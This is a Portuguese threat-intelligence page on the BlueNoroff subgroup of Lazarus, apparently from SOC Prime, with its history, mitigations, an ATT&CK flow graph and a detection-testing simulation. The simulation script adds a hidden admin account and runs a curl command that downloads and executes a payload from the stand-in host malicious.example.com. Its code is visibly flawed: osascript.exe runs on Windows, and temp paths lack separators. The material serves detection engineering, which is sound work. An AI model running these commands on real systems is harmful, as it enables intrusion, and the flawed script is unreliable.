SOC Prime Bias: Crítico

21 Jan 2026 18:58
newspaper icon picussecurity.com

Grupo BlueNoroff: O Braço de Cibercrime Financeiro do Lazarus

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Grupo BlueNoroff: O Braço de Cibercrime Financeiro do Lazarus
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

BlueNoroff é um subgrupo do ecossistema Lazarus voltado para atividades financeiras, focando em operações de roubo de alto valor contra bancos, empresas de criptomoedas e alvos mais amplos da Web3. As táticas do grupo abrangem fraudes habilitadas por SWIFT, comprometimentos de watering-hole, envenenamento da cadeia de suprimentos de pacotes Go e caminhos de intrusão macOS construídos em torno de iscas de “entrevistas de emprego” falsas. Para alcançar execução e persistência, BlueNoroff mescla uma pilha de malware modular Rust/Go com AppleScript, VBScript e fluxos de engenharia social projetados para contornar a cautela do usuário e se misturar com atividades legítimas de desenvolvimento e administração.

Investigação

O relatório rastreia a trajetória do BlueNoroff desde o assalto ao Banco de Bangladesh em 2016 até atividades mais recentes da era 2025 na cadeia de suprimentos, destacando como as ferramentas e alvos do ator se expandiram junto com o ecossistema cripto/Web3. Pesquisadores delineiam padrões de infraestrutura e catalogam componentes de malware incluindo GhostCall, GhostHire, RustBucket e GillyInjector. A investigação também mapeia comportamentos observados no MITRE ATT&CK, abrangendo estágios como reconhecimento e acesso inicial, depois execução, persistência e roubo de credenciais, sublinhando uma ênfase consistente em manter discretos pontos de apoio, entrega planejada de cargas úteis e caminhos de acesso prontos para roubo.

Mitigação

Reduza a exposição apertando a higiene da cadeia de suprimentos: valide pacotes retirados de registros públicos, imponha controles de fixação e proveniência, e revise continuamente atualizações de dependências para mudanças inesperadas de mantenedores ou código. No macOS, fortaleça a governança de LaunchAgent/LaunchDaemon e monitore entradas de persistência suspeitas e ferramentas não assinadas. Bloqueie domínios semelhantes usados para entrega de iscas, imponha MFA para identidades privilegiadas e serviços expostos externamente, e operacionalize detecções para scripts, carregadores e técnicas de empacotamento maliciosas conhecidas associadas ao ator. Mantenha atualizações frequentes de inteligência de ameaças e reforçe o treinamento de usuários focado em phishing direcionado e padrões de engenharia social de “recrutadores/entrevistas de emprego”.

Resposta

Se indicadores de BlueNoroff forem descobertos, isole hosts afetados e preserve evidências chave, incluindo linhas de comando completas, conteúdo de scripts e binários soltos ou artefatos de pacotes. Bloqueie domínios maliciosos identificados e IPs de C2, então execute playbooks de resposta a incidentes alinhados a cenários de roubo de credenciais e comprometimento da cadeia de suprimentos. Implante ou ajuste detectores para cadeias de execução AppleScript e VBScript, e para padrões suspeitos de PowerShell apontados no relatório, depois amplie a caça para identificar endpoints adicionais expostos à mesma isca, dependência ou sobreposição de infraestrutura.

“graph TB %% Class Definitions classDef technique fill:#99ccff classDef action fill:#ffdd99 classDef operator fill:#ff9900 %% Technique Nodes gather_identity[“<b>Técnica</b> – <b>T1589 Coleta de Informações de Identidade da Vítima</b><br/>Coleta informações pessoais, profissionais e online sobre o alvo.”] class gather_identity technique search_social[“<b>Técnica</b> – <b>T1593.001 Busca em Redes Sociais</b><br/>Consulta contas de redes sociais de propriedade da vítima para localizar dados úteis.”] class search_social technique phish_info[“<b>Técnica</b> – <b>T1598.001 Phishing para Informações</b><br/>Elabora mensagens para enganar vítimas e conseguir que revelem credenciais ou outros dados.”] class phish_info technique spearphish_service[“<b>Técnica</b> – <b>T1566.003 Spearphishing via Serviço</b><br/>Usa um serviço online legítimo para entregar conteúdo malicioso à vítima.”] class spearphish_service technique launch_agent[“<b>Técnica</b> – <b>T1543.001 Launch Agent</b><br/>Instala um agente de inicialização no macOS para obter persistência.”] class launch_agent technique launch_daemon[“<b>Técnica</b> – <b>T1543.004 Launch Daemon</b><br/>Instala um daemon de inicialização no macOS para obter persistência.”] class launch_daemon technique tcc_manip[“<b>Técnica</b> – <b>T1548.006 Manipulação TCC</b><br/>Modifica as configurações de Transparência, Consentimento e Controle para obter privilégios mais altos.”] class tcc_manip technique software_packing[“<b>Técnica</b> – <b>T1027.002 Empacotamento de Software</b><br/>Comprime ou criptografa a carga útil para evadir análise.”] class software_packing technique masquerading[“<b>Técnica</b> – <b>T1036.005 Mascaramento</b><br/>Renomeia arquivos ou usa ícones familiares para parecer legítimo.”] class masquerading technique gui_input[“<b>Técnica</b> – <b>T1056.002 Captura de Entrada GUI</b><br/>Grava toques no teclado ou inputs do mouse de interfaces gráficas para roubar credenciais.”] class gui_input technique system_info[“<b>Técnica</b> – <b>T1082 Descoberta de Informações do Sistema</b><br/>Coleta versão do SO, detalhes de hardware e software instalado.”] class system_info technique data_local[“<b>Técnica</b> – <b>T1005 Dados do Sistema Local</b><br/>Copia arquivos de interesse do host infectado.”] class data_local technique local_staging[“<b>Técnica</b> – <b>T1074.001 Organização de Dados Locais</b><br/>Coloca dados coletados em um diretório para exfiltração posterior.”] class local_staging technique web_protocols[“<b>Técnica</b> – <b>T1071.001 Protocolos Web</b><br/>Usa HTTP/HTTPS para tráfego de comando e controle.”] class web_protocols technique dead_drop[“<b>Técnica</b> – <b>T1102.001 Resolvedor Dead Drop</b><br/>Obtém instruções de um local hospedado publicamente.”] class dead_drop technique bidirectional[“<b>Técnica</b> – <b>T1102.002 C2 Bidirecional</b><br/>Permite comunicação em duas vias entre atacante e malware.”] class bidirectional technique oneway[“<b>Técnica</b> – <b>T1102.003 C2 Unidirecional</b><br/>Apenas recebe comandos do atacante sem enviar dados de volta.”] class oneway technique %% Action Nodes user_click[“<b>Ação</b> – Usuário clica em link malicioso e baixa carga”] class user_click action %% Operator Node (optional AND for persistence options) op_persistence((“E”)) class op_persistence operator %% Connections gather_identity u002du002d>|leva a| search_social search_social u002du002d>|leva a| phish_info phish_info u002du002d>|leva a| spearphish_service spearphish_service u002du002d>|aciona| user_click user_click u002du002d>|estabelece| op_persistence op_persistence u002du002d>|usa| launch_agent op_persistence u002du002d>|usa| launch_daemon launch_agent u002du002d>|habilita| tcc_manip launch_daemon u002du002d>|habilita| tcc_manip tcc_manip u002du002d>|habilita| software_packing tcc_manip u002du002d>|habilita| masquerading software_packing u002du002d>|facilita| gui_input masquerading u002du002d>|facilita| gui_input gui_input u002du002d>|fornece| system_info system_info u002du002d>|suporta| data_local data_local u002du002d>|prepara| local_staging local_staging u002du002d>|exfiltra via| web_protocols web_protocols u002du002d>|suporta| dead_drop dead_drop u002du002d>|suporta| bidirectional bidirectional u002du002d>|suporta| oneway “

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Cheque de Telemetria & Linha de Base deve ter passado.

Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.

  • Narrativa e Comandos do Ataque:

    1. Execução de AppleScript (T1546.016) – O adversário solta um payload.scpt malicioso no endpoint (por exemplo, via anexo de phishing). Usando um osascript.exe pré-instalado (incluído com uma ferramenta de terceiros), eles iniciam o script para executar uma carga de PowerShell que adiciona uma nova conta de administrador local.
    2. Entrega ClickFix de Área de Transferência (T1204.004) – O atacante copia um comando artesanal para a área de transferência que invoca curl com um agente de usuário no estilo Zoom para baixar uma carga de segunda etapa, em seguida, a executa imediatamente via cmd.exe. O comando também inclui uma chamada inline powershell.exe -c para executar a carga útil na memória.

  • Script de Teste de Regressão: O script abaixo reproduz ambos os comportamentos de forma determinística.

    #----- INÍCIO DO SCRIPT DE TESTE DE REGRESSÃO -----
# Certifique-se de que estamos executando com privilégios administrativos
if (-not ([Security.Principal.WindowsPrincipal] `
    [Security.Principal.WindowsBuiltInRole] "Administrator")) {
    Write-Error "Executar este script como Administrador."
    exit 1
}

# 1. Execução de AppleScript via osascript.exe
$appleScriptPath = "$env:TEMPmalicious.scpt"
Set-Content -Path $appleScriptPath -Value @"
tell application "System Events"
    do shell script "powershell -c `"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'`""
end tell
"@
# Execute o AppleScript
Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait

# 2. Entrega ClickFix estilo área de transferência
$clickFixCmd = 'curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o $env:TEMPpayload.exe && powershell.exe -c "Start-Process $env:TEMPpayload.exe"'
# Execute via cmd.exe para coincidir com a condição da regra
Start-Process -FilePath "cmd.exe" -ArgumentList "/c `$clickFixCmd" -NoNewWindow -Wait

# Limpeza: remova artefatos
Remove-Item -Path $appleScriptPath -Force
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue
# Fim do script
#----- FIM DO SCRIPT DE TESTE DE REGRESSÃO -----

  • Comandos de Limpeza: Remova qualquer processo, arquivo e conta de usuário de teste remanescente.

    # Pare qualquer processo remanescente (defensivo – normalmente não é necessário)
Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue | Stop-Process -Force

# Exclua arquivos temporários
Remove-Item -Path "$env:TEMPmalicious.scpt" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue

# Remova a conta de administrador de teste se foi criada
if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
    Remove-LocalUser -Name "eviluser"
}

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente